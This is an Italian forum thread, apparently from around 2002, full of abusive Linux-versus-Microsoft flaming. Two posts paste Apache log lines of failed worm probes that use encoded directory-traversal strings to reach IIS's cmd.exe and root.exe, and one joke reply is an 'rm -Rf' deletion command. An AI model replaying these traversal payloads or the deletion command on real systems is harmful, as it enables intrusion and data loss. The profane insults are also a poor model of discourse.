          Non sono affatto d'accordo... prova a
          comparare le feature di un kernel 2.0 con
          quelle di un 2.4

          Poi fai lo stesso paragone con tutti gli
          altri kernel unix che trovi in giro e dimmi
          chi presenta il maggior supporto a features
          "totali".

          Il fatto che poi linux sia un kernel
          architetturalmente "alla vecchia maniera" è
          una questione di scelte....
          Linux è fatto per funzionare bene, non per
          sperimentare voli pindarici in c.

          (avevo trovato un bel paper su una
          architettura di OS "totale"... se lo ritrovo
          mando il link...)se ti va mandamelo per emailgrazie, ciaoPino Silvestrel1vo8f1yv9hw08a001@sneakemail.com
    • Anonimo scrive:
      Re: lotta ai monopolisti imperialisti
      A parte la storia di Di Pietro ( che secondo me e` il piu` ignorante di tutti gli italioti) sono completamente d'accordo a meta` col mister !
    • Anonimo scrive:
      Re: lotta ai monopolisti imperialisti

      lotta ai monopolisti imperialisti

      Solo dei ragazzini ignoranti e manager
      esaltati
      Chi parla male di linux sicuramente non
      l'ha mai
      utilizzato.Forse è proprio perche' lo ha usato!!
    • Anonimo scrive:
      Re: lotta ai monopolisti imperialisti
      - Scritto da: Pino Silvestre
      lotta ai monopolisti imperialisti

      Solo dei ragazzini ignoranti e manager
      esaltati
      possono scegliere volontariamente di
      abbracciare
      l'imperialismo della microsoft,
      abbindolati
      dal marketing.

      Chi parla male di linux sicuramente non
      l'ha mai
      utilizzato.

      L'ignoranza dilaga, in TV non c'e`
      piu`
      cultura, si riduce la spesa per la
      ricerca
      scientifica e nessuno dice niente,
      mentre se
      un calciatore ultrapagato canna un
      tiro
      scoppiano putiferi, sprange,
      scazzottamenti,
      danni...

      italiani, siamo un popolo di ignoranti,
      abbiamo
      politici ignoranti, ce lo meritiamo, io
      vorrei
      sapere con questi dannati presupposti quanto
      puo`
      essere oculata la scelta di regalare i
      dati dei
      ministeri della pubblica amministrazione
      alla
      micro$oft in cambio di tangenti.

      Pian pianino i grossi capitali sono
      riusciti a
      mettere fuori uso anche Di Pietro,
      hanno
      smantellato il pool di mani pulite, e ci
      culliamo
      nelle false statistiche della
      forrester
      research senza renderci conto che in quasi
      tutti
      i PC italiani NON C'E` software
      italiano, e
      se micro$$$oft decide di triplicare il
      prezzo
      di office noi italiani siamo chinati
      a 90
      gradi pronti a farci sodomizzare
      ovviamente
      pagando con i soldi pubblici.

      Manca la competenza, la gente usa
      micro$oft
      perche` e` stupida, ignorante, non
      ha ed
      assolutamente non vuole avere la
      competenza
      necessaria fosse solo per distinguere
      tra un
      virus ed un malfunzionamento di un programma.

      Pochi qui si rendono conto di cosa voglia
      dire che
      Micro$$oft detiene il copyright dei
      formati
      con cui sono conservati i LORO dati.

      IGNORANTI IGNORANTI IGNORANTI

      Pino SilvestreCORNUTO CORNUTO TESTA DI CAZZO PEZZO DI MERDA VAFFANCULO VERME DELLA TERRA.
  • Anonimo scrive:
    W Microsoft
    ma quale cappello rosso o scarpe verdi o centesimi gialli ...un'azienda che si chiama così è già poco allettante di per sè, figurarsi se vende un software scritto da bimbetti e falliti per bimbetti e falliti come il linoops!inoltre certa gente piratesca e poco rispettabile così imparentata strettamente con lo stallato dovrebbe essere spedita direttamente in galera senza neppure passare dal viavorrei proprio sapere cosa c'entra Microsoft con i loro fallimenti commercialiDell, Compaq, Hp e co alla fine avranno anche dato l'elemosina a quel CTO che con fare pateticamente piagnucoloso chiedeva se per favore gli mettevano quel porcaio di sistema operativo che nessuno vuole sul loro hardware di prima classein modo da rovinarsi la reputazione e la clientelae loro giustamente gli hanno fatto l'elemosina e l'hanno cacciato fuori!vedete cari linuxari, gli utenti finali vogliono Windows un sistema operativo scritto da persone capaci e di successo per persone capaci abbienti e di successo non Linoops che è un sistema operativo di DUBBIA PROVENIENZA scritto da incapaci falliti e pirati per altri incapaci pezzenti sbafatori e poco abbientie questa gente viene a dire che Microsoft non gli ha reso disponibile l'office su questo esempio di PIRATERIA PLATEALE su questo esempio di PLAGIO ?a quale scopo ?Saluti a tutti esclusi quei pirati haker dei linuxariI miei migliori dispetti ai linuxariil solito super-MCSE, strenuo difensore della libertà e dell'innovazione
    • Anonimo scrive:
      Re: W Microsoft
      207.99.88.13 - - [25/Mar/2002:13:25:53 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:25 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:26 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:26 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:27 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:27 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:27 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:28 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:28 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:29 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:29 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:30 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:30 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:31 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:31 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:31 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:32 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
      • Anonimo scrive:
        Re: W Microsoft
        Volevo rispondere a quella emerita testina che ha iniziato il thread, mi sembra fosse un tale MCSE (gia` uno che si chiama cosi`...), purtroppo il censore mi ha bloccato le risposte dirette.Vabbe...Dunque, che dire, a uo che e` riuscito a scrivere cosi` tante idiozie in cosi` poche righe non gli si puo` che fare i complimenti, qunque facciamoglieli !Dai tutti in coro !TU SI CHE SEI UN POVERO FALLITO !!!!Invece di insultare la gente come hai fatto senza che nessuno ti provocasse e mostrando quindi tutta la tua ingonranza non che` la tua repressione (sei forse senza il pisello ?), vedi di tornare a clickare le tue belle iconcine colorate !SALAM !
    • Anonimo scrive:
      Re: W Microsoft
      La gente come questa persona, è gente ignorante e non ha nessuna conoscenza informatica e non vuole comprendere quanto importante sia l'innovazione, lo sviluppo della informatica in generale. Se si continua di questo passo esisterà un'unica realtà informatica che ha nome Micro$$$$ e noi pagheremo pagheremo milioni e milioni.Cmq la tua bene amata Micro$$$$ ricorda che non ha fatto niente per circa 20 anni di vita ha solo venduto fumo, acquisito in se molte SoftwareHouse e basta. Tutti i programmi non realizzati da essa sono programmi stabili e scalabili, mentre i suoi fanno pena.Concludo dicendo povera ignoranzaCiao a tutti.
    • Anonimo scrive:
      Re: W Microsoft
      Nelle newsgroup (ma lo saprete già) i tizi come questo si chiamano Troll, volontariamente polemici, gettano benzina sul fuoco per poi ridere dei flames che ne scaturiscono.La soluzione è non rispondere.Ciao
    • Anonimo scrive:
      Re: W Microsoft
      - Scritto da: MCSESenti, troll, mi hai rotto le scatole e non resito più, quindi ti devo rispondere per le rime.Vincerai te ma almeno mi posso sfogare un po' con un pagliaccio come te!
      ma quale cappello rosso o scarpe verdi o
      centesimi gialli ...Beh, che c'è da ridere ? Perchè un'azienda che si chiama micro e soft ?Viste le premesse, tu ce l'hai di sicuro micro e softEd hai anche altri problemi di cui qui non mi và di discutere perchè finirei OT
      un'azienda che si chiama così è già poco
      allettante di per sè, figurarsi se vende un
      software scritto da bimbetti e falliti per
      bimbetti e falliti come il linoops!Intanto Linux è un sistema operativo scritto da persone di elevatissimo livello tecnico per persone dello stesso livello.Come tutti gli unix.Adesso tentiamo (e direi con risultati incoraggiarlo) di portarlo sul desktop e di renderlo più semplice anche ai meno esperti.Lo stesso non si può dire di Winzzoz-spazzatura, un sistema operativo scritto solo per fare soldi su persone di scalsa cultura basandosi su tecniche di marketing.Come vendere i frigoriferi agli eschimesi.Non ti rendi conto di quanto sei infantile.Sei proprio patetico.
      inoltre certa gente piratesca e poco
      rispettabile così imparentata strettamente
      con lo stallato dovrebbe essere spedita
      direttamente in galera senza neppure passare
      dal viaRedHat è un'azienda pulitissima che tratta software di primo livello.E nessuno è un pirata.Lo stesso non si può dire di Microsoft che, oltre ad avere *ILLEGITTIMAMENTE* un *MONOPOLIO* ed a utilizzarlo in modo *ILLEGITTIMO*, sfrutta quanto può il software OpenSource come quello dei *BSD.Dovresti vergognarti delle tue affermazioni!Dimostri ignoranza ed incompetenza.
      vorrei proprio sapere cosa c'entra Microsoft
      con i loro fallimenti commerciali C'entra che Microsoft ha *UN MONOPOLIO* !E con la forza di questo *MONOPOLIO*, impedisce agli altri con prodotti migliori dei suoi di diffonderli sul mercato.E questa forza la manifesta in molteplici vie.Solo persone con le bende sugli occhi (per non dire di peggio) non lo vedono.E -per di più- ci sono le prove.
      Dell, Compaq, Hp e co alla fine avranno
      anche dato l'elemosina a quel CTO [...]
      in modo da rovinarsi la reputazione e la
      clientelaTu sei l'unica persona patetica che vedo qui in giro. E diverrai di sicuro anche piagnucoloso quando ci sarà la sentenza finale di condanna per M$.Vorrei vederti quando la spezzetteranno in tante minuscole parti!Qui, l'unico modo di rovinarti la reputazione è quello di distribuire software M$, con tutti i bachi che ci sono e con gli spyware che installi con loro.Software di m...Dì, quanto ti paga mamma M$ per fargli pubblicità ?[...]

      vedete cari linuxari, gli utenti finali
      vogliono Windows un sistema operativo
      scritto da persone capaci e di successo per
      persone capaci abbienti e di successo HA! HA! HA! HA! HA! HA! HA! HA!HA! HA! HA! HA! HA! HA! HA! HA!Ma quali persone capaci ?Persone che non capiscono una m..za come te!Troll, sei proprio patetico!
      non
      Linoops che è un sistema operativo di DUBBIA
      PROVENIENZA scritto da incapaci falliti e
      pirati per altri incapaci pezzenti sbafatori
      e poco abbientiTe lo dico un'altra volta:Non ci sono atti di pirateria nello sviluppo di LinuxE' tutto software originale, e rilasciato freeMa per te, che lo ritieni di dubbia provenienza, questo non fa differenza.Mi fai proprio pena.

      e questa gente viene a dire che Microsoft
      non gli ha reso disponibile l'office su[...]
      a quale scopo ?Troll, non meriteresti neppure una risposta, ma anche se non la cerci te la do lo stesso:Allo scopo di rilanciare un la competizione nel mercato dei sistemi operativi.Oggi ti sembra che ci sia una scelta se non Winzozzefetent ?Soprattutto considerando i software già acquisiti (e pagati) dai vari utenti.Ma sei cieco e questo non lo vedi.
      il solito super-MCSE, strenuo difensore
      della libertà e dell'innovazioneHA! HA! HA! HA! HA! HA! HA! HA!HA! HA! HA! HA! HA! HA! HA! HA!Sei proprio un pagliaccio!Sei veramente sicurio di difendere la libertà e l'innovazione ?Sei proprio sicuro che per prendere la certificazione mcse non hai imparato solo a fare la scimmia pigiando sui bottoni a schermo e sugli wizard ?E che fa il wizard *DENTRO IL SISTEMA* ?Ah ... questo *NON* ve lo insegnano ... interessante !Saluti troll, ti auguro un bel po' di "bene" ...qualcuno certificato seriamente
    • Anonimo scrive:
      Argomentazioni zero...Re: W Microsoft
      vediamo questa perladi consulente IT quali argomentazioniporta, vediamo un po`, son curioso,- Scritto da: MCSEMicrosoft Certified Selfdestruction Engineeruhm, uno che ha PAGATO la microsoftper un pezzo di carta sperando che serva...
      ma quale cappello rosso o scarpe verdi o
      centesimi gialli ...
      un'azienda che si chiama così è già poco
      allettante di per sè, figurarsi se vende un
      software scritto da bimbetti e falliti per
      bimbetti e falliti come il linoops!hai lavorato per la Red Hat?No? e allora che parli a fare?
      inoltre certa gente piratesca e poco
      rispettabile così imparentata strettamente
      con lo stallato dovrebbe essere spedita
      direttamente in galera senza neppure passare
      dal viachi usa linux e` gente piratesca?perche` non paga quello che non e` in vendita?quanto sei intelligente...
      vorrei proprio sapere cosa c'entra Microsoft
      con i loro fallimenti commercialifallimenti commerciali? di chi?!?!?tu in testa hai furbizia allo stato puro
      Dell, Compaq, Hp e co alla fine avranno
      anche dato l'elemosina a quel CTO che con
      fare pateticamente piagnucoloso chiedeva se
      per favore gli mettevano quel porcaio di
      sistema operativo che nessuno vuole sul loro
      hardware di prima classehai guardato i sorgenti del kernel?No?Allora parli a membro di cane...
      in modo da rovinarsi la reputazione e la
      clientelaconosci clientela rovinata da linux?No?Allora parli a membro di cane...
      e loro giustamente gli hanno fatto
      l'elemosina e l'hanno cacciato fuori!di che stai parlando?lo sai?No?Allora parli a membro di cane...
      vedete cari linuxari, gli utenti finali
      vogliono Windows un sistema operativo
      scritto da persone capaci e di successo per
      persone capaci abbienti e di successo non
      Linoops che è un sistema operativo di DUBBIA
      PROVENIENZA scritto da incapaci falliti e
      pirati per altri incapaci pezzenti sbafatori
      e poco abbientiCioe` chi e` abbiente scrive softwaremeglio di chi e` pezzente,e chi e` incapace sviluppa per linuxsecondo te...conosci qualche incapace come dici tu in gradodi scrivere qualche programma non banale sotto linux?No?Allora parli a membro di cane...
      e questa gente viene a dire che Microsoft
      non gli ha reso disponibile l'office su
      questo esempio di PIRATERIA PLATEALE su
      questo esempio di PLAGIO ?
      a quale scopo ?sono le scimmiette che sanno SOLO usareoffice che voglio office ugualeuguale sotto linux, e ce lo trovano pure...
      Saluti a tutti esclusi quei pirati haker dei
      linuxariLinuxari haker? ma che sei Luca Panerai?No?Allora parli a membro di cane...
      I miei migliori dispetti ai linuxari
      il solito super-MCSE, strenuo difensore
      della libertà e dell'innovazioneLa liberta` di avere i MIEI datinel formato proprietario di una aziendamonopolistica...questa liberta` te la puoi schiaffarenella porta parallela...Ah, ma, aspetta, non sai che Micro$oftha copiato a piene mani dal software GNUe lo ha modificato quel tanto per renderlopropritetario?No?Allora parli a membro di cane...peste TI colgaPino Silvestre
    • Anonimo scrive:
      Re: W Microsoft
      - Scritto da: MCSE[snip]Non sei neanche piu` divertente. Cerca di inventarti almeno qualcosa di nuovo!
    • Anonimo scrive:
      Re: W Microsoft
      - Scritto da: MCSE
      vedete cari linuxari, gli utenti finali
      vogliono Windows un sistema operativo
      scritto da persone capaci e di successo per
      persone capaci abbienti e di successo nonPersone capaci e di successo che mettono in vendita nuove versioni con vecchi difetti ancora irrisolti.Difetti che devono essere resi noti da terzi perche' loro sono troppo impegnati a sviluppare la prossima versione ancora piu' straordinaria (e naturalmente con lo stesso bug).E un bel giorno, dopo che hai scaricato la versione rivoluzionaria di IE 6 (e ti senti anche al sicuro perche' e' stata sviluppata facendo attenzione alla sicurazza) scopri che ha un bug che si trascina dalla versione 5, e che neanche nella 5.5 sp2 era stato risolto. Bello, funzionale, veloce, coinvolgente.. ma inaffidabile.Purtroppo questa politica viene applicata alla maggior parte del software M$.No, grazie. Ho gia' dato.CiaoFabio
  • Anonimo scrive:
    Re: Sono tutte cavolate
    ORA CI DOVRESTI SPIEGARE PERCHE' USI WINDOWS QUANDO LINUX E' COSI' FACILE AD ESEMPIO OGGI HO ABILITATO IL CAPS LOCK RICOMPILANDO IL KERNEL E SCRIVO TUTTO MAIUSCOLO MI SEMBRA MOLTO FACILE E INTUITIVO SOLO CHE ORA DEVO RICOMPILARLO PER TOGLIERLO E QUANDO SCRIVO MAKE MAIUSCOLO NON FUNZIONA ma incollando un pezzo di nastro adesivo allo shift annullo gli effetti del caps lock e scrivo normale questo dimostra che linux e' flessibile infatti potevo anche incollare l'altro shift al contrario di windows dove c'e' un solo modo per usare caps lock ed e' quello che ha deciso microsoft ovvero premere caps lock e questo limita la mia liberta' essendo software closed ma viene spacciato per innovazione la morale e' sempre quella usate debian e seguite la buona stella ovvero il software libero e free senza mai piegarvi alle minacce e ai soprusi quindi usate debian altrimenti vi aizzo il cane ovvero rollerdog il cucciolo a reazione ma non reazionario psmario se mi leggi guarda che rollerdog si ricorda ancora quella storia della bicicletta che tu chiami incidente quindi e' meglio se non vieni piu' a trovare mia sorella che fra parentesi ti odia perche' usi stampede linux e non debian gnu/linux stable
    • Anonimo scrive:
      Re: Sono tutte cavolate
      - Scritto da: Linucs
      ORA CI DOVRESTI SPIEGARE PERCHE' USI WINDOWS
      QUANDO LINUX E' COSI' FACILE AD ESEMPIO OGGI
      HO ABILITATO IL CAPS LOCK RICOMPILANDO IL
      KERNEL E SCRIVO TUTTO MAIUSCOLO MI SEMBRA
      MOLTO FACILE E INTUITIVO SOLO CHE ORA DEVO
      RICOMPILARLO PER TOGLIERLO E QUANDO SCRIVO
      MAKE MAIUSCOLO NON FUNZIONA ma incollando un
      pezzo di nastro adesivo allo shift annullo
      gli effetti del caps lock e scrivo normale
      questo dimostra che linux e' flessibile
      infatti potevo anche incollare l'altro shift
      al contrario di windows dove c'e' un solo
      modo per usare caps lock ed e' quello che ha
      deciso microsoft ovvero premere caps lock e
      questo limita la mia liberta' essendo
      software closed ma viene spacciato per
      innovazione la morale e' sempre quella usate
      debian e seguite la buona stella ovvero il
      software libero e free senza mai piegarvi
      alle minacce e ai soprusi quindi usate
      debian altrimenti vi aizzo il cane ovvero
      rollerdog il cucciolo a reazione ma non
      reazionario

      ps

      mario se mi leggi guarda che rollerdog si
      ricorda ancora quella storia della
      bicicletta che tu chiami incidente quindi e'
      meglio se non vieni piu' a trovare mia
      sorella che fra parentesi ti odia perche'
      usi stampede linux e non debian gnu/linux
      stableCredo che le tue parole si commentino da sole.... se tu vuoi sottostare a M$ in attesa delle patch per le sue voragini, o sottostare ad usare quello che dice lei, fatti tuoi... noi vogliamo avere e volgiamo che gli altri abbiano la possibilita' di scegliere... io sono convinto che un utente che nn sa' usare un pc, impara il primo s.o. che si trova sul pc..... quale esso possa essere si sa'...ma anche questo deve cambiare... se ti vuoi limitare a clikkare e quando hai un problema riavvii senza sapere il perche' del problema..... auguri.........
    • Anonimo scrive:
      Re: Sono tutte cavolate
      - Scritto da: Linucs
      ORA CI DOVRESTI SPIEGARE PERCHE' USI WINDOWS
      QUANDO LINUX E' COSI' FACILE AD ESEMPIO OGGI
      HO ABILITATO IL CAPS LOCK RICOMPILANDO IL
      KERNEL E SCRIVO TUTTO MAIUSCOLO MI SEMBRA........rm -Rf /home/linucs
  • Anonimo scrive:
    Re: Sono tutte cavolate ? Le tue !
    - Scritto da: zap
    Ti sfido a farlo, se puoida quando usi debian gnu/linux/unstable ti vedo piu' massiccio e aggressivo cosi' va bene infatti il software libero ha bisogno di patrioti come noi ma non di martiri anche per questo oggi ho installato debian gnu/hurd an/alfa/beta e sono pronto a sfidare chiunque voglia sostenere il monopolio del monopolista in questo contesto sociale antagonista ammortizzato dalle tensioni di una societa' vittima del consumismo imperialista in cui i diritti degli utenti vengono prevaricati dagli sviluppatori software senza scrupoli al servizio delle multinazionali ma questo non avviene con la gpl quindi fate cmoe me e zap usare linux usate debiandammi una gdammi una pdammi una lGIPIELLEUSE KAZOOOPEN DOORINSTALL DEBIAN GNU LINUX STABLEGRAB BROOM ALIENCOMPILE OPENOFFICE WITH BROOM ALIENGIVE SOURCE TO BROOM ALIEN
  • Anonimo scrive:
    non è una questione di "rientro"...
    se la microsoft facesse office per linux, nel giro di un anno linux supererebbe i vari windows anche sul mercato desktop...
    • Anonimo scrive:
      Re: non è una questione di
      - Scritto da: CaRp\Work
      se la microsoft facesse office per linux,
      nel giro di un anno linux supererebbe i vari
      windows anche sul mercato desktop...Staroffice? mai usato?credimi, va molto bene su linux (provato da un papà sessantenne - dopo 30 minuti faceva le presentazioni stile powerpoint)
    • Anonimo scrive:
      Re: non è una questione di
      - Scritto da: CaRp\Work
      se la microsoft facesse office per linux,
      nel giro di un anno linux supererebbe i vari
      windows anche sul mercato desktop...Ma se settimana scorsa tutto il forum mi ha dato contro dicendo che StarOffice è meglio di OfficeQualcuno aveva anche tirato fuori quella immane cazzata che e' GNUMERIC.Adesso invece Office è diventata la Killer Application di LinuxLa coerenza dove è finita?
      • Anonimo scrive:
        Re: non è una questione di
        - Scritto da: Matteo
        Ma se settimana scorsa tutto il forum mi ha
        dato contro dicendo che StarOffice è meglio
        di Officesicuramente come prezzo
        Adesso invece Office è diventata la Killer
        Application di Linuxcerto, dal momento che per la gente videoscrittura = office. Poi non si pone il problema di cosa c'e' sotto. Il problema cmq resta... sia dei doc che apri solo con office, sia del fatto che e' pesante, sia del fatto che costerebbe troppo, sia del fatto che fondamentalmente avere un prodotto non standard (perche' office non lo e'... nemmeno quando salva in rtf o in html) ti obbliga a scegliere sempre quel prodotto anche in futuro.Io sinceramente me ne frego se tu vuoi usare office. Quello che mi rompe e' quando tu imponi a me che magari ho scelto un altro prodotto, magari piu' adatto alle mie esigenze, ad acquistarne un altro piu' costoso, piu' pesante, assolutamente inutile, e per di piu' prodotto da una e una sola ditta, solo per vedere il tuo .doc che riuscirei a leggere benissimo in un formato standard.la tua liberta' finisce dove inizia la mia.
    • Anonimo scrive:
      Re: non è una questione di
      - Scritto da: CaRp\Work
      se la microsoft facesse office per linux,
      nel giro di un anno linux supererebbe i vari
      windows anche sul mercato desktop...Se Microsoft facesse le applicazioni anche per gli altri SO si darebbe la zappa sui piedi.Hanno fatto delle versioni per Mac perche' sono stati costretti dall'antitrust americana.Francamente mi farei anche dei problemi ad usare Office per Linux conoscendo i precedenti... Ciao Fabio
    • Anonimo scrive:
      Re: non è una questione di

      se la microsoft facesse office per linux,
      nel giro di un anno linux supererebbe i vari
      windows anche sul mercato desktop...Non capisco perchè una mossa simile non l'abbia già fatta IBM; basterebbero Lotus SmartSuite e AS/400 Client Access e tutte le aziende con AS/400 potrebbero installare Linux sui PC.
  • Anonimo scrive:
    Re: Sono tutte cavolate ? Le tue !
    - Scritto da: zap
    E' il momento di LIBERARE il mercato da un
    dittaore economico che impedisce la crescita
    del settore.

    E' il momento di attuare una azione civile
    di BOICOTTAGGIO dei prodotti microsoft.

    E' ora di chiudere le fonti di alimentazione
    di quell'azienda succhia-risorse che è
    microsoft: non acquistiamo (e non
    diffondiamo neanche illegalmente) il suo
    software e i suoi prodotti.
    Succhia risorse? quali le tue?Microsoft e i suoi sistemi hanno molti pregi , cosi come linux. Ma un utente medio ha bisogno di:1)Un sistema operativo intuitivo e immediato. Linux non lo è ancora.2)La possibilità di avere consulenza e assistenza. In italiano. Linux non lo fa ancora.3)Un parco software ad ampio respiro e facilmente reperibile. Linux non c'è l'ha ancora.Facilmente con un click. Capiscimi eh...Se invece devi divertirti un po di piu usa LinuxMa anche un'azienda (grossa non la piccola azienda) ha bisogno di un sistema di mercato (consulenti ecc ecc) che Linux e il suo mondo non puo ancora fornire.
    • Anonimo scrive:
      Re: Sono tutte cavolate ? Le tue !
      - Scritto da: Reply
      Succhia risorse? quali le tue?anche le mie dai un occhiata ai miei log di apache e poi dimmi se posso mandare a M$ il conto della banda:63.236.75.228 - - [25/Mar/2002:13:40:26 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:27 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:27 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:27 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:28 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:28 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:29 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:29 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:30 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:30 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:31 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:31 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:31 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:32 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"207.99.88.13 - - [25/Mar/2002:13:25:53 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:25 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:26 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
    • Anonimo scrive:
      Re: Sono tutte cavolate ? Le tue !
      - Scritto da: Reply


      - Scritto da: zap


      E' il momento di LIBERARE il mercato da un

      dittatore economico che impedisce la
      crescita

      del settore.



      E' il momento di attuare una azione civile

      di BOICOTTAGGIO dei prodotti microsoft.



      E' ora di chiudere le fonti di
      alimentazione

      di quell'azienda succhia-risorse che è

      microsoft: non acquistiamo (e non

      diffondiamo neanche illegalmente) il suo

      software e i suoi prodotti.



      Succhia risorse? quali le tue?basta notare quanti stati USA mossero l'azione contro microsoft. per risponderti.Basta notare che sono rimasti comunque 9 stati a contrastare le azioni monopolistiche di microsoft, e che tra questi stati c'è la California, la patria di Silicon Valley.Microsoft distrugge illegittimamente la concorrenza (il processo lo ha dimostrato), sopprimendo la nascita o la crescita di nuove soluzioni. *Questa* è distruzione di risorse
      Microsoft e i suoi sistemi hanno molti pregi
      , cosi come linux. Ma un utente medio ha
      bisogno di:
      1)Un sistema operativo intuitivo e
      immediato. Linux non lo è ancora.A parte che ciò non è vero: una una Mandrake o una Suse (e una RedHat), e vedrai che sarai d'accordo con me.inoltre è ormai palese il motivo per cui c'è tanta difficoltà di diffusione di Linux nel settore desktop: è perchè viene ostacolato dal monopolista come lo è stato BeOS. Agli atti del processo esistono le pressioni di microsoft sugli OEM.
      2)La possibilità di avere consulenza e
      assistenza. In italiano. Linux non lo fa
      ancora.sciocchezze! Esistono moltissime società di assistenza anche in Italia. Vuoi che te le citi?
      3)Un parco software ad ampio respiro e
      facilmente reperibile. Linux non c'è l'ha
      ancora.
      Facilmente con un click. Capiscimi eh...Balle: www.rpmfind.comfacilmente con un clic, ci siamo capiti
      Ma anche un'azienda (grossa non la piccola
      azienda) ha bisogno di un sistema di mercato
      (consulenti ecc ecc) che Linux e il suo
      mondo non puo ancora fornire.Ballissime! esistono moltissime società professionali che operano su LINUX, con LINUX, e atraverso LINUX.Tempo fa ho già risposto a queste balle (diffuse ad arte) intrise di pregiudizio.
      • Anonimo scrive:
        Re: Sono tutte cavolate ? Le tue !
        - Scritto da: zap
        Balle: www.rpmfind.com
        facilmente con un clic, ci siamo capitiguarda che ora devi usare apt-get mica quel giocattolo di rpm che oltretutto a pensarci non e' free cioe' libero invece apt-get si' infatti su debian c'e' quello pensaci un po'
    • Anonimo scrive:
      Re: Sono tutte cavolate ? Le tue !
      - Scritto da: Reply


      - Scritto da: zap


      E' il momento di LIBERARE il mercato da un

      dittaore economico che impedisce la
      crescita

      del settore.



      E' il momento di attuare una azione civile

      di BOICOTTAGGIO dei prodotti microsoft.



      E' ora di chiudere le fonti di
      alimentazione

      di quell'azienda succhia-risorse che è

      microsoft: non acquistiamo (e non

      diffondiamo neanche illegalmente) il suo

      software e i suoi prodotti.



      Succhia risorse? quali le tue?
      Microsoft e i suoi sistemi hanno molti pregi
      , cosi come linux. Ma un utente medio ha
      bisogno di:
      1)Un sistema operativo intuitivo e
      immediato. Linux non lo è ancora.Perché?Specificare, please.
